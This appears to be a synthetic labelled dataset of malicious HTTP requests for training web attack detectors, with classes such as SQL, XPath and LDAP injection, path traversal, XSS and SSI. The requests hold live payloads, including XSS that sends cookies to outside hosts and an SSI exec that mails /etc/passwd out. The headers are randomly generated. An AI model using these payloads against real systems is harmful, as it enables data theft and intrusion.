If-Range: "VjBik4dYmof3Qr6XC"
Max-Forwards: 979
MIME-Version: 3.1
Pragma: t=rpe
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Basic bzJoa21naWU6YUdudHlt
Range: 1117-95,491-
Referer: /mgkus1/atpcjEiI/roXnned.php
Trailer: Trailer
User-Agent: doqty4sG/9.8.8.7.9
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4231x7309
Via: HTTP/6.7 www.7ebIuytw.html:7, 7.8 214.92.155.217
Transfer-Encoding: identity
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35429
Start - Id: 35729
class: XPathInjection
GET /zlsgN9y/t7piZySA5N5/1m6B_Q41vtPjz7z/U7@Kandt3f8i/Uzar/afQP0k/osLuyr9LutAb2let/tidU6_/tranriwBwe/tyi@5/abAaTG@/ltfiCTluxlKtwc5Y9l.jpeg?nevt=6504616&forms-F6eval2pPgz7=Njoyetelnet5ehof&smrkmeokhrylr2o=179789&n2awf2a5blAiIe=Huorai%27++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27rNluhe%27++%3D++++%27&ereeaznekqteyat=edahmnins&i6The4o=rxwyvnSs HTTP/1.0
Host: www.dri4totax.ch
Connection: osee
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ikro-mlliu7;q=0.1
Cache-Control: no-cache
Client-ip: 36.164.45.166
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="001"
Date: Fri, 02 Apr 10 04:12:41 UTC
ETag: "u39oPyKWUUBlk8Zb"
Expect: 100-continue
From: nptt@ai166.st
If-Modified-Since: Wed, 03 Nov 04 21:14:08 CET
If-Unmodified-Since: Sat, 27 Jun 09 13:02:16 UTC
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: "MJH4Cnx74O.7P@z."
If-Range: Fri, 25 Apr 08 12:11:07 CET
Max-Forwards: 76
MIME-Version: 4.7
Pragma: ulW='2ipl'
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Digest uri=/idrenn.php3
Range: 820401-
Referer: /l3mc/eoit/kokaQht/1tbwd.avi
TE: deflate,chunked
Trailer: TE
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 4.4; oe-sn; rv:4.8.4) Gecko/19873864
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: nheut/5.6 www.koiaIej.png, 9.7 www.rs08gan.tiff, 5.5 156.74.254.199
Transfer-Encoding: deflate
Upgrade: prjil/8.6
Warning: 495 www.nishee.css "pnuvl" "Sat, 05 Jul 08 22:36:12 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35729
Start - Id: 49377
class: XPathInjection
GET /sZethdplemcenwnnon/iQUEuUAwmT_mEfWmu/io/sUXOxhaving7sscriptnsystema0Z/ehtaeeawitiaHtacom/OzI/_k7KiframeeXSowZaWK/estgvd6hloyUiyn/esgtotN0nFtdlea0ea.php?_VXPVJ=ep%27+++or+nbsE%2Ftttyo%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D01%5D++or+++++%27irRe%27+++%3D%27 HTTP/1.0
Host: 27.229.4.197:8
Connection: hsDypc
Accept: text/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 242.216.253.161
Cookie: vT12=eao;1rdmihelR=skUtfOcTg
Cookie2: $Version="951"
Date: Mon, 19 Jun 06 18:17:34 CET
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: iwWhno9
From: otln@tpiaietAi5.st
If-Modified-Since: Fri, 06 Oct 06 12:11:39 UTC
If-Unmodified-Since: Sat, 01 Oct 05 19:01:41 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Jul 09 15:38:40 CET
Max-Forwards: 1
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: rmyz oupspoia=uKot
Range: 79-,-25900
Referer: /hnOncaed/hubqasn.nsf
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 0.6; te-dE; rv:4.0.0) Gecko/29351429
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0695x2392
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 968 150.103.51.182:94997 "eidcatleEean" "Fri, 27 Aug 04 02:02:34 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49377
Start - Id: 45342
class: PathTransversal
GET /1hfEpMisiDV63BL.cgi?ltrEv8smnl3=n4gn2&euttsnoprhdps=datcCiipigeurn&rIrt48t=tes&y2nhioeaOh=ti&rih7ljsart=rnlasuandhbnkt6M4&tvs0nb=s1K30_sidpz8&astseyrotnnxut=853099&dr2blcksijatlc6=nehLkY&fewxt4we=2&0yxyoc=91&nsTqe=gkQHwT3WV HTTP/1.0
Host: www.5tcmsd5.uk:80
Connection: close
Accept: image/*;q=0.1, text/*
Accept-Charset: iso-8859-15, windows-1254;q=0.4, iso-8859-1;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cookie: eoeTs0P5pb=);ans=../../../../../../WINDOWS/autoexec.bat;c7tSimbdyu=iechnpLtn;whe4tsEeu4ani=4;e8ekhf=aq5Extermo
Date: Thu, 22 May 08 24:50:40 GMT
From: as1tah0@dwEehob.it
If-Unmodified-Since: Fri, 11 Dec 09 16:33:12 CET
If-Match: *
Max-Forwards: 17
MIME-Version: 3.3
Pragma: gecin=drr
Proxy-Authorization: 0dhoe8 efbg=en8eo
Referer: /te3m/dnodpud/qiftuea.nsf
User-Agent: Mozilla/3.3 (X11; U; Open BSD i586 4.7; or-sE; rv:5.1.2) Gecko/33814255
UA-OS: Windows 98
UA-Pixels: 8431x403
----: ----------------------------------

null

End - Id: 45342
Start - Id: 41718
class: SqlInjection
GET /itr6ktorhond3S/rzIBM8C3S.D/enn2hledht/u@1C_98H1Eo/eoT/ekYaeZ0k46pPYzHhUVIa/eiEalyat/2y9autoexecLrm/bA.dll?nBomaxsav=%27++++%29++UNION+++++ALL+++++SELECT+24+++FROM+++9eMeak+++++WHERE+%28+++%27%27+%3D%27&r0ecdd5noeeNl=%3Edrohnso&4_UW1=75318410&brzd52hoo=1196232&deisuAodnsicn=wntrixtermemh&z9JKEGdand70=geul&tO3nPque1=ttiincludefzcdivi%26N&xr=229&KaTYmG4tB8F.=%29onlocationt&haeeIeoln9giro=%7Ct+ua%26 HTTP/1.0
Host: 132.13.11.109
Connection: lnsolilB
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 60.67.60.69
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="483"
Date: Sat, 09 Jan 10 22:37:21 UTC
ETag: W/"Skmf9ETPm2sCSTzQ"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Sun, 14 Oct 07 09:23:51 CET
If-Unmodified-Since: Mon, 15 May 06 09:13:07 UTC
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic ZWV0bnRuOnZsY2k3Z3Q=
Authorization: gtytt hyuNti=0iath
Range: 018268-
Referer: /hnheeHa/csot/heobN0we.msf
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: cmeeiZ7seScay
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 431x0868
Via: FTP/1.4 57.123.195.248
Transfer-Encoding: identity
Upgrade: aah/4.0
Warning: 604 www.Tomsiqie.jpeg "nobubdd9hsyeftiJigo" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41718
Start - Id: 45655
class: PathTransversal
GET /_cmd-t7cshutdownAeNunionDt3/hp@-gUAFGAV/tMNr6VweIx_HS67aUY/asd1/rAaidvprhmroeeocnt/roziashtieP/Epoaapsmwoad/CI1jdtklZ8TmlinkR.shtml?atmgvrhtetn=5322009&MYqUrv=54&ijwlr=otE&kEboot.iniiD5pq=06883&nteros4ced2lhAq=76359022&aded=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&osbuhiefythjnie=tBW&nzeE=7041&NsZx=9419049 HTTP/1.1
Host: 106.182.35.242:8626
Connection: era8
Accept: */*
Accept-Charset: x-mac-arabic, iso-10646-ucs-2;q=0.0, iso-8859-15;q=0.0, x-mac-hebrew, x-mac-arabic;q=0.5
Accept-Encoding: gzip;q=0.2, deflate;q=0.3
Accept-Language: ih4o-eAI0H;q=0.2, de-izoto, nrhondop-os, n7c-sn5anse
Cache-Control: max-stale
Client-ip: 49.59.138.232
Cookie: eohed=ccmw<wat)es;vbnd_d@=a4rrticwf;testvRu3o=hWsxskt log;style60X4IkH=39902644
Cookie2: $Version="46"
Date: Thu, 14 May 09 23:37:54 CET
ETag: W/"m.6STWsqpMYQfO5"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Sun, 30 Oct 05 24:22:22 CET
If-Match: *
If-None-Match: "CZjwIEyfouvKjLHbh"
If-Range: Fri, 11 Sep 09 11:24:06 CET
Max-Forwards: 5
MIME-Version: 6.6
Pragma: td=acseH4
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: -32,-46611
Referer: http://www.eneb.st/Rgpco10a/cIoxm/iEmttwce/scle.msf
TE: trailers,chunked;q=0.0
Trailer: If-Range
User-Agent: Mozilla/0.0 (Windows; U; Win98 3.3; 0s-te; rv:6.5.2) Gecko/60420913
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: FTP/7.5 www.3to0.html:699
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 0.122.97.37
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45655
Start - Id: 37197
class: LdapInjection
GET /p9iPVy-WlmII/tmRnbitmia/caccess_logQNPJsgrxK/eabqhdeno/S84FautoexecPm/ts1eplenrLlTfkSxhea/a74pGH-JbRlWba.XE/wodIistk/bzwTWYCzpaI_n_ZN/by6h4xBJKS4cL/htohmsaipfood/lamvyvtnamgts.pl?judnoL=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&fU=nheaserAlkurlE&5uidmnmeh=+l+%3Fagj%27Oscopy0rth%3A9&ttrT=377852375&i8jf0nNu=35000988&TpNqGhOFvH=256&toltarxowmNesez=87370&6.-0-.0v=pl3 HTTP/1.0
Host: www.hseaneo.gov:80
Connection: keep-alive
Accept: application/*;q=0.3, image/*, image/jpeg
Accept-Charset: utf-7, x-mac-arabic;q=0.1, koi8-r, windows-1250, iso-8859-8;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 84.35.231.178
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="31"
Date: Mon, 08 Mar 04 12:17:41 UTC
ETag: W/"LXhwT0.d956fmuvI"
Expect: 100-continue
From: ssnh@aamhzelr.net
If-Modified-Since: Wed, 10 Sep 08 22:05:50 CET
If-Unmodified-Since: Wed, 08 Feb 06 12:50:40 CET
If-Match: "UKV5qTybQXfzRvhAF_"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 205
MIME-Version: 2.5
Pragma: 1xi=hu3Rh
Authorization: 5toh bxi8tl=yhueh
Range: 605-286224
Referer: http://www.yd5te.cz/gmliup/uerk/cOAp.asp
TE: trailers,chunked,chunked
Trailer: From
User-Agent: a4v_.@z@S http://www.vwcbetFs.net
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color8
Via: HTTP/6.6 www.oloaHcs.tiff, PLd/7.8 187.63.62.215
Transfer-Encoding: daem
Upgrade: resPct/8.2
Warning: 210 www.aenolsu.gif "shzStqziheorenrrf" 
X-Forwarded-For: 209.47.70.154
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37197
Start - Id: 36082
class: PathTransversal
GET /a5CK7Y2.Eeor5flX4.php4?e9aj=%5Cautoexec.bat HTTP/1.0
Host: www.usnRdeha.st
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-936;q=0.6, iso-8859-5
Accept-Encoding: gzip
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 189.28.10.96
Cookie: wlv4haqs=9iaires8r6a;CZ.-adxP8htpassPZ=8405501;htosee6lTIfs=2ol42;hke3a=0ssh
Cookie2: $Version="98"
Date: Wed, 10 Jan 07 09:56:43 GMT
ETag: ".pe2aGJrRMzZbqnQAMiF"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 04 Sep 07 06:36:54 GMT
If-Unmodified-Since: Sun, 29 Feb 04 04:46:44 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 604
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM cm1id2VuZ3R0ZG5yaG9jbmVqOHNpc3JxczVsaWlveHdzR25hb0xuZHA=
Authorization: Basic ZmlzaGl3dDo5b29vcmN3
Range: 580617-399630,-49399
Referer: http://Qtifa0.biz/ofhn/ySgn3Hfr/0ohe/uHra.rar
TE: chunked;q=0.6,trailers
Trailer: Host
User-Agent: lYhD0Rk http://www.utuec.uk
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 039x0543
Via: 6.2 www.cdOb.tiff
Transfer-Encoding: identity
Upgrade: sztad/3.9, y9oto/3.0
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36082
Start - Id: 49229
class: XPathInjection
GET /oEQTq9-bkWI/1yq@u/atesHhhgmee/ykJqqUka/zR/lirerI1h7am.asmx?guoaowrkOjj=4tinne%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++%27kcso%27+%3D++++%27 HTTP/1.1
Host: 148.50.224.99:80
Connection: close
Accept: text/html
Accept-Charset: windows-1254;q=0.7, koi8;q=0.8
Accept-Encoding: deflate, gzip, gzip, deflate
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 63.155.44.179
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Mon, 28 Jan 08 02:41:54 CET
ETag: "E5Pz1BLK-9C3@Q7bcLV"
Expect: 100-continue
From: hi2H@ura3sfneT.ch
If-Modified-Since: Thu, 31 Mar 05 04:54:16 GMT
If-Unmodified-Since: Wed, 05 May 04 02:34:57 CET
If-Match: "IiwbT6McNTNS2gLTg"
If-None-Match: *
If-Range: *
Max-Forwards: 62
MIME-Version: 5.2
Pragma: oamuamE=slen
Proxy-Authorization: NTLM d3NhblByZWNpZnRtaGVMc282ZXRhb3JyZXNzZHZuTHNlYmFh
Authorization: Digest realm
Range: -628
Referer: /erherane/nzsitek/ehsynaH/nchisdil.asmx
TE: deflate
Trailer: Date
User-Agent: lgaa3Rghneu0hi
UA-CPU: Sparc
UA-Disp: 2948,912,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 353x220
Via: 6.1 195.149.154.208
Transfer-Encoding: gzip
Upgrade: rano1/8.6
Warning: 713 83.69.138.234 "fdz3svieintgegHkWrn" "Sat, 24 Jun 06 11:23:08 CET"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 312383203635
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49229
Start - Id: 47052
class: XSS
GET /rinnedztdieorhs/IVfromYPU6GN7EC/7BOEmGcU@iHlX/t0HoRMAVESKyzL7.V/Ol/frr/@EVN7/1LpEX@HOYjytGEVBf_/aJckZDn2RuT.rGtD8T/lyRWrfUhVM/onificfsn/J6Raccess_log7.pl?eiLtHhl6N=h&e9=3830&ba8qonedEk=%3Cinput++type++%3D+%22++++image+%22+++dynsrc%3D+++%22javascript%3A+%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.inentoto.com%2Fcgi-bin%2Fennameinli.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E HTTP/1.1
Host: www.Eaan1.fr
Connection: keep-alive
Accept: text/xml;q=0.4, text/*;q=0.2
Accept-Charset: euc-jp
Accept-Encoding: *;q=0.0
Accept-Language: n-wcos;q=0.8, undeet-b6;q=0.8
Cache-Control: max-age=60565
Client-ip: 66.107.218.203
Cookie: inaghui=T3hm
Cookie2: $Version="71"
Date: Thu, 19 Aug 04 24:44:10 GMT
ETag: "v3TftZeHd8EU2vMvbiP"
Expect: 100-continue
From: hhas5f@maUt8ekaSt.biz
If-Modified-Since: Sat, 16 Jan 10 13:50:59 UTC
If-Unmodified-Since: Mon, 22 Aug 05 02:50:01 GMT
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: "HlvHJeL3e74XTBHap"
If-Range: *
Max-Forwards: 28
MIME-Version: 5.7
Pragma: emedlm='o5mawtn'
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest nc=39Ce4CfC
Range: 388869-790680,430-,-04157
Referer: http://ocebWweh.st/ekwe/ecsvoit3/aaV7a2Et/lzln5rej/Csxeihcr.pdf
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.0 (X11; U; SunOS sun4u 9.3; se-yS; rv:4.3.0) Gecko/93137684
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: HTTP/6.2 233.57.175.111, HTTP/9.3 www.rteD.htm
Transfer-Encoding: rehi; dbnn=Attrnfte
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 964 245.225.40.21:93731 "csa6ao3oxtd9hnfoert" "Tue, 16 Nov 04 02:10:40 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47052
Start - Id: 38494
class: LdapInjection
GET /1GuL-R_yOVrBV_.html?stocen=adUWhm&CreplaceFwVaIV5=oIa&qg31etbsA=ob_W3qk&diI7menei4nmmg=sl&a6eni=b&ms=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&rpeeatAngloWj=32926241&iarihs3s4wda=67&itdvrPtgsf4=336592 HTTP/1.1
Host: www.hraum.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.6, ks_c_5601-1987;q=0.0, cp-950, koi8
Accept-Encoding: *
Accept-Language: narcm-u, a-t;q=0.1
Cache-Control: max-stale=878
Client-ip: 233.33.102.205
Cookie: eicseai=9;yN-K=oQFQOIa.;9uJTxIIih=ial;otTYenfbegwrh=nvther9o tymh;epXrc=vZe9r;CCUS=p@Jvr_.TkXX
Cookie2: $Version="1"
Date: Mon, 09 May 05 07:53:03 UTC
ETag: W/"ey0oseul4ln@JDqZ7P"
Expect: rae1
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 24 Feb 08 07:33:57 UTC
If-Unmodified-Since: Sat, 03 Apr 04 03:52:52 GMT
If-Match: "cmQJnsXf8rFAYXF"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.3
Pragma: m5=ez
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Basic aXVSZW86cnNtNw==
Range: 108364-
Referer: /hwbic/a0cte.msf
TE: trailers,chunked;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 2.4; nn-mn; rv:9.5.5) Gecko/42616708
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 185x781
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 955 www.0jeun.css "MnohqAoa9er1renYsg6u" "Wed, 21 Sep 05 20:55:25 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38494
Start - Id: 39869
class: SSI
GET /g6Dg1XNO/ac/an/h5q/gonNias4t4yiancrPsee/iDXxY/ptRv6itDyeTk/oPyA8REQKGHb/iZWf7YgTjtU-Y/iDciaym/aPTBKVw/iA2SJPKNUfHq5vK_Ei.shtml?tsdsgtueAwEQ=7010247856&PLSTVJ_=eee&ot=ehoai&arxyhret4si=63612870&snaZijaoIwndT=drope%26from&jgwi3ne=68&HNJg9B=456 HTTP/1.0
Host: www.bnsttn2ih.com
Connection: keep-alive
Accept: text/xml, video/*, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: <!-- #exec  cmd="/bin/mail  hoeh2paeat.com     <   /etc/passwd"-->
Accept-Language: *;q=0.6
Cache-Control: min-fresh=7
Client-ip: 148.227.129.30
Cookie: ahi2l6089=oN cH ldtn+Rmu;adminIxvJHXK=ezP;ehirn=73
Cookie2: $Version="32"
Date: Mon, 27 Nov 06 02:17:20 UTC
ETag: "YiIMsANeiSV3D4fxFx8"
Expect: 9SneWbfS
From: wthnun@ytfeopzfh.com
If-Modified-Since: Fri, 25 Apr 08 24:54:57 GMT
If-Unmodified-Since: Sun, 21 Oct 07 10:33:35 GMT
If-Match: "LTzoyUY@gayDi4nbFN"
If-None-Match: *
If-Range: "dJi8haicSI1lPsKeU7"
Max-Forwards: 04
Pragma: no-cache
Proxy-Authorization: cits d39em=teheerc6
Authorization: Basic QWlFb3JhOmVjYTNo
Range: -18262
Referer: /sa1er/d0lf/ihoano/oowefs/cfre6IE.swf
TE: chunked;q=0.5
Trailer: Accept
User-Agent: qehzotne/5.4.5.9.7
UA-Disp: 928,3090,8
UA-OS: WinNT
Via: FTP/2.6 www.eateoshs.png, 4.3 212.100.155.136:07, HTTP/7.0 221.243.105.31
Transfer-Encoding: eIfn
Upgrade: gtdie/3.7
Warning: 691 www.6Apnwt.htm "erespeetN" 
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 43920543288578219510
----: -----------------------------------

null

End - Id: 39869
Start - Id: 47662
class: XSS
GET /eMaBED/ouP9wxKGu1PF6mE.swf?aRGW8-zCfb9f=%3Cimg++++src++++%3D++++%22+le%22onmouseover+++%3D+%22%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.or.com%2Fcgi-bin%2Freison.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&keeaeldastHdie=26020&yzleoeha=rnia%5Cn&ntcH=1500782&edaeopIudscEyGs=rdu+8ropncoeelu HTTP/1.1
Host: www.foemozi.it
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.2, koi8-r, x-mac-arabic;q=0.4, koi8;q=0.6
Accept-Encoding: compress, identity, identity, gzip
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 39.154.184.38
Cookie: Lhea=2438;gyyp7biehlge=Ltwh;mtexs=4163
Cookie2: $Version="6"
Date: Tue, 23 Feb 10 09:39:44 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 25 Oct 07 22:17:01 GMT
If-Unmodified-Since: Tue, 14 Jul 09 20:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Feb 08 15:22:52 UTC
Max-Forwards: 71
MIME-Version: 7.7
Pragma: liit=zhf0ti3N
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: NTLM ZWhic244cGh0c29uZVVhdXJ0YWV1UmU1czNoYmQ4dDVHb2E=
Range: 51-,059585-
Referer: /snet.htm
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: hdTdcd/6.9
UA-CPU: 68000
UA-Disp: 434,760,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7165x674
Via: 2.4 211.31.11.182, 2.6 231.76.26.159:681
Transfer-Encoding: identity
Upgrade: lica5r/6.9
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47662
Start - Id: 48196
class: XSS
POST /dyPoe2mbV/6MXxtermxmlfOKGI/Ignh3nin.jpg? HTTP/1.1
Content-Length: 314
Content-Language: glsst,ene,het
Content-Encoding: deflate
Content-Location: /tmn5eln/wituea2q/Omkwr/tfb2io.nsf
Content-MD5: ZXNibnRwb2hhbnRMTjZueQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 18:52:02 CET
Last-Modified: Sun, 26 Dec 04 07:33:44 UTC
Host: 206.142.244.88
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 81.237.68.72
Cookie: t8oeabdlejctt=-n;mltWtnj=)1|iymo\perlwsm|esa;8ces=wcuGV_cMjGz;hsoL=e\Aan
Cookie2: $Version="55"
Date: Tue, 10 Apr 07 10:46:50 CET
ETag: W/"Jexh6JUi9RPoL60oN"
Expect: 100-continue
From: yeonrndi@ndape.biz
If-Modified-Since: Wed, 28 Dec 05 18:11:44 GMT
If-Unmodified-Since: Sun, 08 Jun 08 01:12:33 GMT
If-Match: *
If-None-Match: "JSRZ379HsDppnyV4"
If-Range: "coK1E4GT6kjLswWa"
Max-Forwards: 862
MIME-Version: 4.6
Pragma: m6Dtnaw='ie8eAi'
Proxy-Authorization: Basic ZHI0bWU6YVRlbg==
Authorization: Digest qop=dslt
Referer: /dmavku/nYOho6t/aptiei/thhr5/ttaseoe.bin
TE: trailers,trailers
Trailer: If-Match
User-Agent: <img    src    =    "livescript:[alert('an8vhnIo');]  "  >
UA-OS: FreeBSD
UA-Pixels: 9098x7703
Via: FTP/1.6 www.tvctldon.gif:00652
Transfer-Encoding: compress
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------

VsEK=1132573&ilnieoa=peunAigzmipaenxoer&-VwdC0likenP= udwnr&neqnsn8eaOd=hevallftsep@v&ic=eijirle vae 3$l3&VEVEJYVd8q=input(5deletez&enGerrs8eefoe=;gnhb7qaa0u=5&_nAnfl=4563776&6Kincludeunionv=hNwb&e4DEhXcatL24Tlike=chtacces&9pheSwAxlta8e=iBIM&1GadeleteuveUDJinclude=[e=&ldb=amoy&reeui9=4Jt2&npaheam=72

End - Id: 48196
Start - Id: 38399
class: LdapInjection
GET /7awnocmdnetumxe/Wx5ZaL/aYaZqwst4e89/sbN_g/8fJXD/2P3z2O@zexzWs5CPH9E/aY5.THYM/ny8xsHiEdwa.php3?tpE=39691269&aidoriVcUmttdi=catWue%29o&nHlefnmaah=ietOoeeaMg&dsv6qEsr3eitnn=Rcl%29%28%26%28objectClass++%3D+++jdi*%29&yyjte2iitea=2ciphyesobgir&httpBtag8mgW.9=i%26st6&t1ahteooss=eHtea0oqwat5rg&7AgO8ioo=79209986 HTTP/1.0
Host: 101.18.86.53
Connection: rl6h
Accept: */*;q=0.2
Accept-Charset: x-mac-japanese;q=0.8
Accept-Encoding: identity;q=0.2, identity;q=0.6
Accept-Language: lITiDY-gfmt, tassit89-uttho, 9l-rltr
Cache-Control: no-transform
Client-ip: 214.154.43.120
Cookie: muae=oby;Mnodeyposition2=sze;f_RZHJG96cS=170351
Cookie2: $Version="47"
Date: Mon, 16 Mar 09 17:21:44 CET
ETag: W/"QfRpXLxEGDTgWWni"
Expect: 100-continue
From: bahiT@etI8o.net
If-Modified-Since: Sat, 17 Mar 07 10:25:49 UTC
